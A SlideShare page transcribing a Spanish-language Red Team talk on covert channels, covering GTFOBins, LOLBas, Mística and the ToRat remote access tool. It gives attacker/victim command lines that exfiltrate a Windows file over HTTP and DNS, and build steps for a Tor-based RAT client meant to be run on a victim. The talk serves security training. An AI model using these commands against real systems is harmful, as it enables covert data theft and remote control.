SlideShare una empresa de Scribd logo

XIV Jornadas CCN Cert: Covert Channels en operaciones de Red Team

D
Dani Adastra

Este documento presenta información sobre canales encubiertos en operaciones de Red Team. Explica brevemente qué son los canales encubiertos y su uso para exfiltrar información evadiendo mecanismos de detección. Luego, describe algunas herramientas y técnicas disponibles como GTFOBins, LOLBas, Mística y ToRat, las cuales permiten crear canales encubiertos usando protocolos comunes como HTTP, DNS e implementando protocolos personalizados. Finalmente, brinda ejemplos prácticos de cómo usar estas herramientas

Tecnología
Related topics:
Red Team
1 de 11
1
2
3
4
5
6
7
8
9
10
11
#XIVJORNADASCCNCERT Covert Channels en operaciones de Red Team
Foto ponente Daniel Echeverri aka. Adastra The Hacker Way. adastra@thehackerway.com
 Introducción rápida a los canales encubiertos.  Herramientas y técnicas disponibles para la creación de canales encubiertos en post- explotación. Agenda Covert Channels en operaciones de Red Team
 Técnicas enfocadas a la exfiltración de información entre atacante y víctima utilizando medios habituales que no han sido diseñados para dicho propósito y que rompen con la política de seguridad  Uno de los objetivos de la creación de canales encubiertos consiste en evadir mecanismos de detección y/o censura.  Se emplean protocolos de comunicación comunes tales como HTTP, DNS, ICMP entre otros. La información se transmite en campos o secciones concretas de los paquetes de datos típicamente codificada o cifrada. El atacante recibe estos paquetes y debe poder descifrar la información contenida en dichos campos. Introducción rápida. Covert Channels en operaciones de Red Team
 GTFOBins (Unix-Like) y LOLBas (Windows)  En ambos proyectos se encuentran disponibles binarios que permiten la transmisión de información (file upload y/o file download).  Una de las características más llamativas de estos proyectos es que se trata de una colección de binarios “confiables” en estos sistemas operativos que pueden ser empleados para labores de post-explotación, incluyendo la exfiltración.  GTFOBins: https://gtfobins.github.io/  LOLBas: https://lolbas-project.github.io/ Algunas técnicas y herramientas disponibles Covert Channels en operaciones de Red Team
 Uso de Mística: https://github.com/IncideDigital/Mistica  Herramienta que permite embeber información en protocolos habituales en la capa de aplicación (p.e. HTTP o DNS).  Define un protocolo personalizado para la transmisión de información por medio del solapamiento de datos llamado SOTP (Simple Overlay Transport Protocol). En este protocolo la información a transmitir se divide en bloques, se cifra y se envía al servidor (atacante).  El protocolo SOTP en Mística permite utilizar campos concretos en el protocolo de aplicación seleccionado, con el objetivo de transmitir información. Algunas técnicas y herramientas disponibles Covert Channels en operaciones de Red Team
 Mística protocolo HTTP:  En el servidor (atacante): python3.8 ms.py -m io:http -k "rc4testing" -s "--hostname 192.168.1.116 --port 9090"  En el cliente (víctima): python mc.py -m io:http -k "rc4testing" -w "--hostname 192.168.1.116 --port 9090" < C:Windowswin.ini Algunas técnicas y herramientas disponibles Covert Channels en operaciones de Red Team
 Mística protocolo DNS:  En el servidor (atacante): python3.8 ms.py -m io:dns -k "rc4testing" -s "--hostname 192.168.1.1116 --port 9090" -w "--queries SOA"  En el cliente (víctima): python mc.py -m io:dns -k "rc4testing" -w "--hostname 192.168.1.116 --port 9090 --query SOA" < C:Windowswin.ini Algunas técnicas y herramientas disponibles Covert Channels en operaciones de Red Team
 Uso de ToRat: https://github.com/lu4p/ToRat  Proyecto que se define como una herramienta para administración remota (Remote Administration Tool: RAT) pero que dadas sus características puede ser empleada para el establecimiento de side channels (canales ocultos).  El proyecto utiliza una librería en Go llamada Bine ( https://github.com/cretz/bine/) la cual es una implementación del protocolo de control de TOR y permite embeber una instancia de TOR en un binario. Algunas técnicas y herramientas disponibles Covert Channels en operaciones de Red Team
Uso de ToRat. 1- cd <TORAT_DIR> && docker build -t adastraa/torat . 2- docker run -it -v "$(pwd)"/dist:/dist_ext adastraa/torat Se genera el cliente para Windows y Linux en: <ToRat_DIR>/dist/dist/client se envía el binario correspondiente a la víctima y se ejecuta. 3- Se recibe la conexión y se selecciona la víctima con el comando select Algunas técnicas y herramientas disponibles Covert Channels en operaciones de Red Team
MUCHAS GRACIAS

Más contenido relacionado

PPT
Clase 03 Protocolos Y Servicios De Red
Jaime Valenzuela
 
PPT
Cisco Cybersecurity Essential cap 4
Daniel Oscar Fortin
 
PDF
Webinar Gratuito: Analizar Tráfico de Red con Tshark
Alonso Eduardo Caballero Quezada
 
PPTX
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
RootedCON
 
PPTX
Encriptacion HMAC
Universidad de Cuenca
 
PDF
Eduardo Sanchez & Rafael Sojo - Taller de CTF [rooted2018]
RootedCON
 
PDF
Seguridad wi fi wep-wpa_wpa2
TRANS-REFORM S.L
 
PPT
Exploracion de puertos de redes
giulianaCh
 
Clase 03 Protocolos Y Servicios De Red
Jaime Valenzuela
 
Cisco Cybersecurity Essential cap 4
Daniel Oscar Fortin
 
Webinar Gratuito: Analizar Tráfico de Red con Tshark
Alonso Eduardo Caballero Quezada
 
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
RootedCON
 
Encriptacion HMAC
Universidad de Cuenca
 
Eduardo Sanchez & Rafael Sojo - Taller de CTF [rooted2018]
RootedCON
 
Seguridad wi fi wep-wpa_wpa2
TRANS-REFORM S.L
 
Exploracion de puertos de redes
giulianaCh
 

La actualidad más candente (10)

PDF
Escaneo, enumeración de puertos en la red. OMHE
Héctor López
 
PPT
Tcpdump a.2
Tensor
 
PDF
Gestiondeauditoriasdeseguridad
oscar lopez
 
PDF
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
RootedCON
 
PDF
Manual tecnicas de_scaning
millor2005
 
PDF
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
RootedCON
 
PDF
Denegacion de servicio
Tensor
 
PPT
Pitufo Isa Server 2 K6
Chema Alonso
 
PPT
Manual para romper contraseñas WEP y WPA
Paulo Colomés
 
PDF
Actividad No 4.3 IPv4 SSH
Francisco Medina
 
Escaneo, enumeración de puertos en la red. OMHE
Héctor López
 
Tcpdump a.2
Tensor
 
Gestiondeauditoriasdeseguridad
oscar lopez
 
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
RootedCON
 
Manual tecnicas de_scaning
millor2005
 
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
RootedCON
 
Denegacion de servicio
Tensor
 
Pitufo Isa Server 2 K6
Chema Alonso
 
Manual para romper contraseñas WEP y WPA
Paulo Colomés
 
Actividad No 4.3 IPv4 SSH
Francisco Medina
 
Publicidad

Similar a XIV Jornadas CCN Cert: Covert Channels en operaciones de Red Team (7)

PPTX
Ataques de suplantación de identidad
RenataDG05
 
PDF
Intro cybersecurity additional resources and activities
Guido Romo
 
PPTX
Configuracion tcp
elenacediel
 
ODP
Pexacuxa de la Unidad 1 de interconexiones de redes
Álvaro Pérez Alborch
 
PDF
Unidad 6 Seguridad en redes corporativas
vverdu
 
PPTX
Interconexión de redes privadas con redes públicas.
Óscar Ramón
 
PDF
Segurida de redes
Pablo Zamora
 
Ataques de suplantación de identidad
RenataDG05
 
Intro cybersecurity additional resources and activities
Guido Romo
 
Configuracion tcp
elenacediel
 
Pexacuxa de la Unidad 1 de interconexiones de redes
Álvaro Pérez Alborch
 
Unidad 6 Seguridad en redes corporativas
vverdu
 
Interconexión de redes privadas con redes públicas.
Óscar Ramón
 
Segurida de redes
Pablo Zamora
 
Publicidad

Más de Dani Adastra (19)

PDF
IntelCon 2020: Uso avanzado de ZAP para hacking en aplicaciones web
Dani Adastra
 
PDF
ShellCon 2018: Hacking con Python
Dani Adastra
 
PDF
Malt 2020: Ciberseguridad en la empresa
Dani Adastra
 
PDF
IntelCon 2020: OSINT en la Deep web de TOR
Dani Adastra
 
PDF
HoneyCon 2020: Hacking con ZAP
Dani Adastra
 
PDF
HackMadrid 2020: Introducción práctica al RedTeam
Dani Adastra
 
PDF
8dot8 SUR 2020: Introducción práctica al RedTeam
Dani Adastra
 
PDF
SecAdmin 2019: ZAP Proxy: Mucho más que una herramienta de "one-click hack"
Dani Adastra
 
PDF
Morteruelo 2019: Seguridad informática en 50 días YOUR hacker way..
Dani Adastra
 
PDF
HackRon 2019: Python + TOR: Descubrir, analizar y extraer información de serv...
Dani Adastra
 
PDF
H-Con 2018: Hacking con Python
Dani Adastra
 
PDF
UAH 2018: Hacking en la deep web de TOR (for fun and profit)
Dani Adastra
 
PPTX
SecAdmin 2017: Hacking con Python
Dani Adastra
 
PDF
DragonJar 2015: Desmitificando la deep web de tor pentesting sobre instancias...
Dani Adastra
 
PDF
Cybercamp 2014: Tortazo: Desarrollo de un framework de auditoría para la red ...
Dani Adastra
 
PDF
HoneyCon 2017: Pentesting sobre instancias de TOR con Tortazo y TortazoWeb.
Dani Adastra
 
PDF
8dot8 2015: Desmitificando la deep web de TOR - pentesting sobre instancias d...
Dani Adastra
 
PDF
Cybercamp 2017: Hacking TOR & Freenet for fun, profit and stop the evil.
Dani Adastra
 
PDF
Codemotion 2017: Pentesting en aplicaciones node.js AS ALWAYS: FOR FUN AND PR...
Dani Adastra
 
IntelCon 2020: Uso avanzado de ZAP para hacking en aplicaciones web
Dani Adastra
 
ShellCon 2018: Hacking con Python
Dani Adastra
 
Malt 2020: Ciberseguridad en la empresa
Dani Adastra
 
IntelCon 2020: OSINT en la Deep web de TOR
Dani Adastra
 
HoneyCon 2020: Hacking con ZAP
Dani Adastra
 
HackMadrid 2020: Introducción práctica al RedTeam
Dani Adastra
 
8dot8 SUR 2020: Introducción práctica al RedTeam
Dani Adastra
 
SecAdmin 2019: ZAP Proxy: Mucho más que una herramienta de "one-click hack"
Dani Adastra
 
Morteruelo 2019: Seguridad informática en 50 días YOUR hacker way..
Dani Adastra
 
HackRon 2019: Python + TOR: Descubrir, analizar y extraer información de serv...
Dani Adastra
 
H-Con 2018: Hacking con Python
Dani Adastra
 
UAH 2018: Hacking en la deep web de TOR (for fun and profit)
Dani Adastra
 
SecAdmin 2017: Hacking con Python
Dani Adastra
 
DragonJar 2015: Desmitificando la deep web de tor pentesting sobre instancias...
Dani Adastra
 
Cybercamp 2014: Tortazo: Desarrollo de un framework de auditoría para la red ...
Dani Adastra
 
HoneyCon 2017: Pentesting sobre instancias de TOR con Tortazo y TortazoWeb.
Dani Adastra
 
8dot8 2015: Desmitificando la deep web de TOR - pentesting sobre instancias d...
Dani Adastra
 
Cybercamp 2017: Hacking TOR & Freenet for fun, profit and stop the evil.
Dani Adastra
 
Codemotion 2017: Pentesting en aplicaciones node.js AS ALWAYS: FOR FUN AND PR...
Dani Adastra
 

Último (20)

PDF
programa-de-estudios-2011-guc3ada-para-el-maestro-secundarias-tecnicas-tecnol...
ParaVerPeliculas
 
PPTX
Sesion 1 de microsoft power point - Clase 1
carlosmedina2810
 
PDF
ADMINISTRACIÓN DE ARCHIVOS - TICS (SENA).pdf
whomarxxdemie
 
PPTX
ANCASH-CRITERIOS DE EVALUACIÓN-FORMA-10-10 (2).pptx
marceloerazo119
 
PPTX
sa-cs-82-powerpoint-hardware-y-software_ver_4.pptx
jeannettehenriquezor
 
PPTX
Presentación PASANTIAS AuditorioOO..pptx
ange127383
 
PPTX
Acronis Cyber Protect Cloud para Ciber Proteccion y Ciber Seguridad LATAM - A...
CarlosAndresuztes
 
PPT
introduccion a las_web en el 2025_mejoras.ppt
CesarCcamaZenteno
 
PPTX
RAP01 - TECNICO SISTEMAS TELEINFORMATICOS.pptx
josemejiadiazfonseca
 
PPTX
la-historia-de-la-medicina Edna Silva.pptx
adairrojas2
 
PDF
Ronmy José Cañas Zambrano - Potenciando la tecnología en Venezuela.pdf
ronmyjosecanaszambra
 
PPTX
modulo seguimiento 1 para iniciantes del
UcielnicolasMola
 
PPTX
Presentación de Redes de Datos modelo osi
FernandoCabrera177238
 
PDF
capacitación de aire acondicionado Bgh r 410
MiriamVargas760642
 
PDF
MANUAL de recursos humanos para ODOO.pdf
GianCruz26
 
PDF
Influencia-del-uso-de-redes-sociales.pdf
DianaLauraFloresAlva
 
PDF
clase auditoria informatica 2025.........
KatherineMundaca1
 
PPTX
COMO AYUDAN LAS TIC EN LA EDUCACION SUPERIOR.pptx
ap3377309
 
PPTX
IA de Cine - Como MuleSoft y los Agentes estan redefiniendo la realidad
Felipe González
 
PPTX
historia_web de la creacion de un navegador_presentacion.pptx
Carlos704324
 
programa-de-estudios-2011-guc3ada-para-el-maestro-secundarias-tecnicas-tecnol...
ParaVerPeliculas
 
Sesion 1 de microsoft power point - Clase 1
carlosmedina2810
 
ADMINISTRACIÓN DE ARCHIVOS - TICS (SENA).pdf
whomarxxdemie
 
ANCASH-CRITERIOS DE EVALUACIÓN-FORMA-10-10 (2).pptx
marceloerazo119
 
sa-cs-82-powerpoint-hardware-y-software_ver_4.pptx
jeannettehenriquezor
 
Presentación PASANTIAS AuditorioOO..pptx
ange127383
 
Acronis Cyber Protect Cloud para Ciber Proteccion y Ciber Seguridad LATAM - A...
CarlosAndresuztes
 
introduccion a las_web en el 2025_mejoras.ppt
CesarCcamaZenteno
 
RAP01 - TECNICO SISTEMAS TELEINFORMATICOS.pptx
josemejiadiazfonseca
 
la-historia-de-la-medicina Edna Silva.pptx
adairrojas2
 
Ronmy José Cañas Zambrano - Potenciando la tecnología en Venezuela.pdf
ronmyjosecanaszambra
 
modulo seguimiento 1 para iniciantes del
UcielnicolasMola
 
Presentación de Redes de Datos modelo osi
FernandoCabrera177238
 
capacitación de aire acondicionado Bgh r 410
MiriamVargas760642
 
MANUAL de recursos humanos para ODOO.pdf
GianCruz26
 
Influencia-del-uso-de-redes-sociales.pdf
DianaLauraFloresAlva
 
clase auditoria informatica 2025.........
KatherineMundaca1
 
COMO AYUDAN LAS TIC EN LA EDUCACION SUPERIOR.pptx
ap3377309
 
IA de Cine - Como MuleSoft y los Agentes estan redefiniendo la realidad
Felipe González
 
historia_web de la creacion de un navegador_presentacion.pptx
Carlos704324
 

XIV Jornadas CCN Cert: Covert Channels en operaciones de Red Team

  • 2. Foto ponente Daniel Echeverri aka. Adastra The Hacker Way. adastra@thehackerway.com
  • 3.  Introducción rápida a los canales encubiertos.  Herramientas y técnicas disponibles para la creación de canales encubiertos en post- explotación. Agenda Covert Channels en operaciones de Red Team
  • 4.  Técnicas enfocadas a la exfiltración de información entre atacante y víctima utilizando medios habituales que no han sido diseñados para dicho propósito y que rompen con la política de seguridad  Uno de los objetivos de la creación de canales encubiertos consiste en evadir mecanismos de detección y/o censura.  Se emplean protocolos de comunicación comunes tales como HTTP, DNS, ICMP entre otros. La información se transmite en campos o secciones concretas de los paquetes de datos típicamente codificada o cifrada. El atacante recibe estos paquetes y debe poder descifrar la información contenida en dichos campos. Introducción rápida. Covert Channels en operaciones de Red Team
  • 5.  GTFOBins (Unix-Like) y LOLBas (Windows)  En ambos proyectos se encuentran disponibles binarios que permiten la transmisión de información (file upload y/o file download).  Una de las características más llamativas de estos proyectos es que se trata de una colección de binarios “confiables” en estos sistemas operativos que pueden ser empleados para labores de post-explotación, incluyendo la exfiltración.  GTFOBins: https://gtfobins.github.io/  LOLBas: https://lolbas-project.github.io/ Algunas técnicas y herramientas disponibles Covert Channels en operaciones de Red Team
  • 6.  Uso de Mística: https://github.com/IncideDigital/Mistica  Herramienta que permite embeber información en protocolos habituales en la capa de aplicación (p.e. HTTP o DNS).  Define un protocolo personalizado para la transmisión de información por medio del solapamiento de datos llamado SOTP (Simple Overlay Transport Protocol). En este protocolo la información a transmitir se divide en bloques, se cifra y se envía al servidor (atacante).  El protocolo SOTP en Mística permite utilizar campos concretos en el protocolo de aplicación seleccionado, con el objetivo de transmitir información. Algunas técnicas y herramientas disponibles Covert Channels en operaciones de Red Team
  • 7.  Mística protocolo HTTP:  En el servidor (atacante): python3.8 ms.py -m io:http -k "rc4testing" -s "--hostname 192.168.1.116 --port 9090"  En el cliente (víctima): python mc.py -m io:http -k "rc4testing" -w "--hostname 192.168.1.116 --port 9090" < C:Windowswin.ini Algunas técnicas y herramientas disponibles Covert Channels en operaciones de Red Team
  • 8.  Mística protocolo DNS:  En el servidor (atacante): python3.8 ms.py -m io:dns -k "rc4testing" -s "--hostname 192.168.1.1116 --port 9090" -w "--queries SOA"  En el cliente (víctima): python mc.py -m io:dns -k "rc4testing" -w "--hostname 192.168.1.116 --port 9090 --query SOA" < C:Windowswin.ini Algunas técnicas y herramientas disponibles Covert Channels en operaciones de Red Team
  • 9.  Uso de ToRat: https://github.com/lu4p/ToRat  Proyecto que se define como una herramienta para administración remota (Remote Administration Tool: RAT) pero que dadas sus características puede ser empleada para el establecimiento de side channels (canales ocultos).  El proyecto utiliza una librería en Go llamada Bine ( https://github.com/cretz/bine/) la cual es una implementación del protocolo de control de TOR y permite embeber una instancia de TOR en un binario. Algunas técnicas y herramientas disponibles Covert Channels en operaciones de Red Team
  • 10. Uso de ToRat. 1- cd <TORAT_DIR> && docker build -t adastraa/torat . 2- docker run -it -v "$(pwd)"/dist:/dist_ext adastraa/torat Se genera el cliente para Windows y Linux en: <ToRat_DIR>/dist/dist/client se envía el binario correspondiente a la víctima y se ejecuta. 3- Se recibe la conexión y se selecciona la víctima con el comando select Algunas técnicas y herramientas disponibles Covert Channels en operaciones de Red Team